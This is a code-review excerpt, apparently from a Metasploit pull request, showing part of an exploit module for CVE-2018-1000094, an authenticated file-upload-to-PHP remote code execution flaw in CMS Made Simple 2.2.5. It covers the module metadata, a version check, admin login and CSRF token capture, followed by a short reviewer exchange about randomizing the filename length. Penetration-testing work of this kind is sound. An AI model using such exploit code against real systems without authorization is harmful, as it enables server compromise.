modules/exploits/multi/http/cmsms_upload_rename_rce.rb

```diff
@@ -0,0 +1,161 @@
+      'Description'     => %q{
+        CMS Made Simple v2.2.5 allows an authenticated administrator to upload a file
+        and rename it to have a .php extension. The file can then be executed by opening
+        the URL of the file in the /uploads/ directory.
+      },
+      'Author' =>
+        [
+          'Mustafa Hasen',  # Vulnerability discovery and EDB PoC
+          'Jacob Robles'    # Metasploit Module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ 'CVE', '2018-1000094' ],
+          [ 'CWE', '434' ],
+          [ 'EDB', '44976' ],
+          [ 'URL', 'http://dev.cmsmadesimple.org/bug/view/11741' ]
+        ],
+      'Privileged'  => false,
+      'Platform'  => [ 'php' ],
+      'Arch'  => ARCH_PHP,
+      'Targets' =>
+        [
+          [ 'Universal', {} ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 03 2018'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base cmsms directory path", '/cmsms/']),
+        OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [ true, "Password to authenticate with", ''])
+      ])
+
+    register_advanced_options ([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+    unless res
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.body =~ /CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/
+      version = Gem::Version.new($1)
+      vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+      vuln = Gem::Version.new('2.2.5')
+
+      if version == vuln
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'loginsubmit' => 'Submit'
+      }
+    })
+    unless res
+      fail_with(Failure::NotFound, 'A response was not received from the remote host')
+    end
+
+    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ /\/admin\?(.*)?=(.*)/
+      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+    end
+    vprint_good("#{peer} - Authentication successful")
+
+    csrf = {$1 => $2}
+    cookies = res.get_cookies
+    filename = rand_text_alpha(10)
```

Comment:
Can this be randomized?

```ruby
filename = rand_text_alpha(8..12)
```

Reply:
This could be randomized. I'll include this.